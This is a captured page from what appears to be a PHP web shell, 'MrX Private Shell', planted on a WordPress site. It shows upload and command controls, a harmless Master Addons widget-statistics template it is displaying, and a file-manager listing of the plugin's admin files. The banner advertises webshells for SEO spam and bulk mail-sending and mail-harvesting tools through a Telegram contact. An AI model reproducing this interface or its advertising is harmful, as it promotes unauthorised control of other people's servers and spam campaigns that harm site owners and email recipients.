__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php
/**
 * Widget Statistics Cards
 * Element Pack Style - Horizontal cards with donut charts
 */

if (!defined('ABSPATH')) {
    exit;
}

// Get widget statistics
$widget_stats = \MasterAddons\Inc\Helper\Master_Addons_Helper::jltma_get_widget_stats();
?>
<div class="jltma-widget-stats">
    <!-- All Widgets Card -->
    <div class="jltma-stat-card">
        <div class="jltma-stat-content">
            <h3 class="jltma-stat-title"><?php esc_html_e('All Widgets', 'master-addons'); ?></h3>
            <ul class="jltma-stat-list">
                <li><span class="jltma-stat-label"><?php esc_html_e('USED:', 'master-addons'); ?></span> <span class="jltma-stat-value"><?php echo esc_html($widget_stats['all']['active']); ?></span></li>
                <li><span class="jltma-stat-label"><?php esc_html_e('UNUSED:', 'master-addons'); ?></span> <span class="jltma-stat-value"><?php echo esc_html($widget_stats['all']['inactive']); ?></span></li>
                <li><span class="jltma-stat-label"><?php esc_html_e('TOTAL:', 'master-addons'); ?></span> <span class="jltma-stat-value"><?php echo esc_html($widget_stats['all']['total']); ?></span></li>
            </ul>
        </div>
        <div class="jltma-stat-chart yellow">
            <svg width="80" height="80" viewBox="0 0 36 36">
                <circle cx="18" cy="18" r="14" fill="none" stroke="#fef3c7" stroke-width="4"/>
                <circle cx="18" cy="18" r="14" fill="none" stroke="#fbbf24" stroke-width="4" stroke-linecap="round" stroke-dasharray="<?php echo esc_attr($widget_stats['all']['percentage']); ?>, 100" transform="rotate(-90 18 18)"/>
            </svg>
        </div>
    </div>

    <!-- Core Card -->
    <div class="jltma-stat-card">
        <div class="jltma-stat-content">
            <h3 class="jltma-stat-title"><?php esc_html_e('Core', 'master-addons'); ?></h3>
            <ul class="jltma-stat-list">
                <li><span class="jltma-stat-label"><?php esc_html_e('USED:', 'master-addons'); ?></span> <span class="jltma-stat-value"><?php echo esc_html($widget_stats['core']['active']); ?></span></li>
                <li><span class="jltma-stat-label"><?php esc_html_e('UNUSED:', 'master-addons'); ?></span> <span class="jltma-stat-value"><?php echo esc_html($widget_stats['core']['inactive']); ?></span></li>
                <li><span class="jltma-stat-label"><?php esc_html_e('TOTAL:', 'master-addons'); ?></span> <span class="jltma-stat-value"><?php echo esc_html($widget_stats['core']['total']); ?></span></li>
            </ul>
        </div>
        <div class="jltma-stat-chart pink">
            <svg width="80" height="80" viewBox="0 0 36 36">
                <circle cx="18" cy="18" r="14" fill="none" stroke="#fce7f3" stroke-width="4"/>
                <circle cx="18" cy="18" r="14" fill="none" stroke="#f472b6" stroke-width="4" stroke-linecap="round" stroke-dasharray="<?php echo esc_attr($widget_stats['core']['percentage']); ?>, 100" transform="rotate(-90 18 18)"/>
            </svg>
        </div>
    </div>

    <!-- 3rd Party Card -->
    <div class="jltma-stat-card">
        <div class="jltma-stat-content">
            <h3 class="jltma-stat-title"><?php esc_html_e('3rd Party', 'master-addons'); ?></h3>
            <ul class="jltma-stat-list">
                <li><span class="jltma-stat-label"><?php esc_html_e('USED:', 'master-addons'); ?></span> <span class="jltma-stat-value"><?php echo esc_html($widget_stats['third_party']['active']); ?></span></li>
                <li><span class="jltma-stat-label"><?php esc_html_e('UNUSED:', 'master-addons'); ?></span> <span class="jltma-stat-value"><?php echo esc_html($widget_stats['third_party']['inactive']); ?></span></li>
                <li><span class="jltma-stat-label"><?php esc_html_e('TOTAL:', 'master-addons'); ?></span> <span class="jltma-stat-value"><?php echo esc_html($widget_stats['third_party']['total']); ?></span></li>
            </ul>
        </div>
        <div class="jltma-stat-chart teal">
            <svg width="80" height="80" viewBox="0 0 36 36">
                <circle cx="18" cy="18" r="14" fill="none" stroke="#ccfbf1" stroke-width="4"/>
                <circle cx="18" cy="18" r="14" fill="none" stroke="#2dd4bf" stroke-width="4" stroke-linecap="round" stroke-dasharray="<?php echo esc_attr($widget_stats['third_party']['percentage']); ?>, 100" transform="rotate(-90 18 18)"/>
            </svg>
        </div>
    </div>

    <!-- Active Card -->
    <div class="jltma-stat-card">
        <div class="jltma-stat-content">
            <h3 class="jltma-stat-title"><?php esc_html_e('Active', 'master-addons'); ?></h3>
            <ul class="jltma-stat-list">
                <li><span class="jltma-stat-label"><?php esc_html_e('CORE:', 'master-addons'); ?></span> <span class="jltma-stat-value"><?php echo esc_html($widget_stats['core']['active']); ?></span></li>
                <li><span class="jltma-stat-label"><?php esc_html_e('3RD PARTY:', 'master-addons'); ?></span> <span class="jltma-stat-value"><?php echo esc_html($widget_stats['third_party']['active']); ?></span></li>
                <li><span class="jltma-stat-label"><?php esc_html_e('TOTAL:', 'master-addons'); ?></span> <span class="jltma-stat-value"><?php echo esc_html($widget_stats['all']['active']); ?></span></li>
            </ul>
        </div>
        <div class="jltma-stat-chart blue">
            <svg width="80" height="80" viewBox="0 0 36 36">
                <circle cx="18" cy="18" r="14" fill="none" stroke="#dbeafe" stroke-width="4"/>
                <circle cx="18" cy="18" r="14" fill="none" stroke="#3b82f6" stroke-width="4" stroke-linecap="round" stroke-dasharray="<?php echo esc_attr($widget_stats['active']['percentage']); ?>, 100" transform="rotate(-90 18 18)"/>
            </svg>
        </div>
    </div>
</div>

Filemanager

Name Type Size Permission Actions
addons-elements.php File 3.22 KB 0775
addons-forms.php File 2.67 KB 0775
addons-marketing.php File 3.24 KB 0775
addons.php File 1.12 KB 0775
api-keys.php File 5.25 KB 0775
changelogs.php File 630 B 0775
extensions.php File 5.69 KB 0775
icons-library.php File 6.4 KB 0775
navigation.php File 2.07 KB 0775
right-column.php File 1.9 KB 0775
supports.php File 9.93 KB 0775
system-info.php File 25.66 KB 0775
third-party-plugins.php File 3.7 KB 0775
version-control.php File 1.81 KB 0775
white-label.php File 16.23 KB 0775
widget-stats.php File 5.67 KB 0775
Filemanager